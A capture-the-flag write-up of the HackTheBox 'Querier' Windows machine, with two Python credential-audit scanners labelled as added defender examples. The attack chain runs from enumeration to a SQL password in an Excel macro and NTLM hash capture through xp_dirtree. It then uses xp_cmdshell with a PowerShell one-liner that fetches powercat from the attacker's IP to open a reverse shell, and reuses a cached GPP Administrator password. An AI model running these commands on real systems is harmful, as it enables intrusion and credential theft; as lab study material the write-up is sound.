Querier

OS: Windows, Difficulty: Medium, IP: 10.10.10.125

Initial Enumeration

# Nmap 7.70 scan initiated Sun Jul 28 02:15:58 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 49670,445,49667,1433,139,49671,49688,5985,135,49669,47001,49664,49665,49666 10.10.10.125
Nmap scan report for 10.10.10.125
Host is up (0.22s latency).

PORT      STATE  SERVICE       VERSION
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?
1433/tcp  open   ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-07-27T12:38:20
|_Not valid after:  2049-07-27T12:38:20
|_ssl-date: 2019-07-27T19:40:20+00:00; -1h06m51s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49669/tcp open   msrpc         Microsoft Windows RPC
49670/tcp open   msrpc         Microsoft Windows RPC
49671/tcp open   msrpc         Microsoft Windows RPC
49688/tcp closed unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h06m50s, deviation: 0s, median: -1h06m51s
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-07-28 01:10:22
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   221.96 ms 10.10.14.1
2   222.13 ms 10.10.10.125

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 28 02:17:19 2019 -- 1 IP address (1 host up) scanned in 81.37 seconds

SMB Enumeration

$ smbmap -u "ANYTHING" -H 10.10.10.125
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.125...
[+] IP: 10.10.10.125:445        Name: 10.10.10.125                                      
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    READ ONLY
        Reports                                                 READ ONLY

Checking the contents of Reports

$ smbclient -U "ANYTHING" \\\\10.10.10.125\\Reports "" -c 'recurse;ls' ""
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
  .                                   D        0  Tue Jan 29 04:53:48 2019
  ..                                  D        0  Tue Jan 29 04:53:48 2019
  Currency Volume Report.xlsm         A    12229  Mon Jan 28 03:51:34 2019

                6469119 blocks of size 4096. 1612111 blocks available

Fetch the file and unzip its contents (an .xlsm is a zip archive; the macro lives in xl/vbaProject.bin)

$ smbclient -U "ANYTHING" \\\\10.10.10.125\\Reports "" -c 'get "Currency Volume Report.xlsm" Reports.xlsm' ""
$ unzip Reports.xlsm -d XL_contents
$ ls -la XL_contents/
total 24
drwxr-xr-x 5 jtnydv jtnydv 4096 Jul 28 00:35  .
drwxr-xr-x 3 jtnydv jtnydv 4096 Jul 28 21:09  ..
-rw-r--r-- 1 jtnydv jtnydv 1087 Jan  1  1980 '[Content_Types].xml'
drwxr-xr-x 2 jtnydv jtnydv 4096 Jul 28 00:35  docProps
drwxr-xr-x 2 jtnydv jtnydv 4096 Jul 28 00:35  _rels
drwxr-xr-x 5 jtnydv jtnydv 4096 Jul 28 00:35  xl

$ cat XL_contents/xl/vbaProject.bin                                                                                                                    
...
(- macro to pull data for client volume reports.0n.Conn]8]Xx                                                                                   
 0(<Open 0B@rver=<SELECT * FROM volume; 0%B.6word> 0!> @ MsgBox "connection successful" 6A1$D%FB@H 6B@BkXo,Set rs = conn.Execute("SELECT * @@version;")
XkDriver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6 0(: further testing requiredHAttribute VB
_Name = "ThisWorkbook"                                                                                       

Credentials for the SQL Server: reporting:PcwTWTHRwryjc$c6
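
A defender's counterpart to the step above, added here as an example that is not part of the original writeup: a Python scanner that opens an .xlsm, reads every vbaProject.bin inside it and reports connection strings that carry a Pwd= value, so a share like Reports can be audited for hard-coded credentials. The sample workbook, host name and password it builds are constructed for the demonstration.

```python
import io
import re
import zipfile

# One key=value pair as written in ODBC/ADO connection strings: the value is either
# a braced token such as {SQL Server} or a run of characters up to ';' or whitespace.
_PAIR_RE = re.compile(r"([A-Za-z_][\w ]{0,30})=(\{[^}]*\}|[^;\x00\s]+)")
_SECRET_KEYS = ("pwd", "password")


def connection_strings(text: str) -> list:
    """Group key=value pairs that sit next to each other (separated only by ';'
    and a space) into one dict per connection string; keep the ones with a password."""
    groups, current, last_end = [], {}, None
    for m in _PAIR_RE.finditer(text):
        if last_end is not None and m.start() - last_end > 2:
            groups.append(current)  # a gap of noise or code: start a new string
            current = {}
        current[m.group(1).strip().lower()] = m.group(2)
        last_end = m.end()
    groups.append(current)
    return [g for g in groups if any(k in g for k in _SECRET_KEYS)]


def scan_xlsm_for_credentials(xlsm_bytes: bytes) -> list:
    """Scan every vbaProject.bin inside a macro-enabled Office file for embedded
    credentials. This reads the raw bytes (decoded as latin-1), which is what exposed
    the string on this box; MS-OVBA-compressed module source would first need a
    decompressor such as oletools' olevba."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith("vbaproject.bin"):
                for cs in connection_strings(zf.read(name).decode("latin-1")):
                    findings.append({"stream": name, **cs})
    return findings


def build_sample_xlsm() -> bytes:
    """Constructed sample: a minimal .xlsm whose vbaProject.bin mixes binary noise
    with a hard-coded reporting connection string (host and password are made up)."""
    vba = (b"\x01\x00\x00\x00junk\x00Set conn = CreateObject(\"ADODB.Connection\")\x00"
           b"Driver={SQL Server};Server=DBHOST;Trusted_Connection=no;"
           b"Database=volume;Uid=reporting;Pwd=Example!Pa55 0(:\x00more noise")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/vbaProject.bin", vba)
    return buf.getvalue()
```

Calling scan_xlsm_for_credentials(build_sample_xlsm()) returns one finding whose uid, pwd, server and database keys hold the embedded values; pointing it at the real Reports.xlsm recovers the reporting login the same way.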

All the scripts used can be found at Impacket's Github Repository.

MS SQL Database Enumeration

$ python mssqlclient.py reporting:PcwTWTHRwryjc\$c6@10.10.10.125 -windows-auth
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> xp_cmdshell "ping"
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL> exec master.dbo.xp_dirtree
[-] ERROR(): Line 0: Error executing extended stored procedure: Invalid Parameter

xp_dirtree, on the other hand, can be executed without any special permission. Because it makes the SQL Server service account connect to whatever UNC path we supply, we can point it at our own SMB server and capture that account's NTLM hash.

On the attacking machine:

sudo python smbserver.py -smb2support -ip 10.10.14.13 myshare .

On the victim's SQL server:

SQL> exec master.dbo.xp_dirtree '\\10.10.14.13\myshare'

Results

[*] Incoming connection (10.10.10.125,49695)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User mssql-svc\QUERIER authenticated successfully
[*] mssql-svc::QUERIER:4141414141414141:a86910d42e63**HASH_VALUE**

This hash can be cracked with John the Ripper or Hashcat to recover the password of the mssql-svc user: mssql-svc:corporate568

$ python mssqlclient.py mssql-svc:corporate568@10.10.10.125 -windows-auth
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell "cmd.exe /c ping 10.10.14.13"
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               
Pinging 10.10.14.13 with 32 bytes of data:                                         
Reply from 10.10.14.13: bytes=32 time=226ms TTL=63                                 
Reply from 10.10.14.13: bytes=32 time=219ms TTL=63                                 
Reply from 10.10.14.13: bytes=32 time=229ms TTL=63                                 
Reply from 10.10.14.13: bytes=32 time=231ms TTL=63                                 
NULL                                                                               
Ping statistics for 10.10.14.13:                                                   
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),                           
Approximate round trip times in milli-seconds:                                     
    Minimum = 219ms, Maximum = 231ms, Average = 226ms                              
NULL                                                                               
SQL> 

We have code execution; now we'll use PowerCat through xp_cmdshell to get a reverse shell on the system. Note that you'll have to host powercat.ps1 on your own machine first so the victim can download it.

SQL> xp_cmdshell 'powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.13/powercat.ps1");powercat -c 10.10.14.13 -p 9999 -e powershell'

User Own

PS C:\Users\mssql-svc\Desktop> type user.txt
type user.txt
c37b4***

Root Own

We'll download and import modules from the PowerSploit repository and use them for further enumeration.

Useful Commands:

## Download a file using PowerShell
powershell -command "& { iwr http://10.10.14.13/PowerUp.ps1 -OutFile PowerUp.ps1 }"

## Import a module from a different location
Import-Module -Name C:\Users\mssql-svc\modules\PowerUp.ps1 -Verbose
PS C:\Users\mssql-svc\Desktop> Get-CachedGPPPassword                                               
Get-CachedGPPPassword

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUncles****}
File      : C:\ProgramData\Microsoft\Group 
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
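
The same check from the defender's side, added here as an example that is not part of the original writeup: a Python audit that walks a cached GPP history folder or a SYSVOL Policies folder and flags every preference file still holding a cpassword attribute, which is exactly what Get-CachedGPPPassword reads. The sample Groups.xml below is constructed and its cpassword is a placeholder, not a real encrypted blob.

```python
import os
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword -> attribute naming the account.
_GPP_FILES = {"groups.xml": "userName", "services.xml": "accountName",
              "scheduledtasks.xml": "runAs", "datasources.xml": "username",
              "drives.xml": "userName"}


def gpp_cpassword_entries(xml_text: str, file_name: str = "Groups.xml") -> list:
    """One dict per <Properties> element that still carries a cpassword. The value
    is not decrypted: its presence is the finding, since Microsoft's AES key is public."""
    account_attr = _GPP_FILES.get(file_name.lower(), "userName")
    findings = []
    for item in ET.fromstring(xml_text).iter():        # <User>, <Service>, <Task>, ...
        for props in item.findall("Properties"):
            if props.get("cpassword") is None:
                continue
            findings.append({
                "file": file_name,
                "account": props.get(account_attr, ""),
                "new_name": props.get("newName", ""),
                "changed": item.get("changed", ""),
                "cpassword_len": len(props.get("cpassword")),
            })
    return findings


def audit_gpp_tree(base_dir: str) -> list:
    """Walk a cached GPP history (C:\\ProgramData\\Microsoft\\Group Policy\\History)
    or a SYSVOL Policies folder and report every preference file with a cpassword."""
    results = []
    for dirpath, _, files in os.walk(base_dir):
        for f in files:
            if f.lower() in _GPP_FILES:
                path = os.path.join(dirpath, f)
                with open(path, encoding="utf-8-sig") as fh:
                    for entry in gpp_cpassword_entries(fh.read(), f):
                        results.append({**entry, "path": path})
    return results


# Constructed sample modelled on the Groups.xml found on this box; the cpassword
# value is a placeholder, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)" changed="2019-01-28 23:12:48">
    <Properties action="U" newName="" userName="Administrator (built-in)"
                cpassword="CONSTRUCTED_PLACEHOLDER_CPASSWORD"/>
  </User>
</Groups>
"""
```

Running audit_gpp_tree against the Group Policy History path shown above lists each stale credential with the account it belongs to and the date it was set; deleting those cached files (and the SYSVOL originals) is the fix, since patching MS14-025 only stops new cpasswords from being created.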

Now we'll use the credentials to execute commands as Administrator.

# Build a PSCredential object from the Administrator password recovered from the cached GPP file
$Username = 'Administrator'
$Password = 'MyUncles***'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass

# Run the command on the local host over WinRM (port 5985 is open) as Administrator
Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt }

PS C:\Users\mssql-svc\modules> Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt } 
Invoke-Command -ComputerName "QUERIER" -Credential $Cred -ScriptBlock { type C:\Users\Administrator\Desktop\root.txt } 
b19c3***

Learning Outcome

Learnt a little too much from this box, NTLM hash catching, Powershell Modules, Invoke-Command module, and MS-SQL using Impacket. Amazing Box.
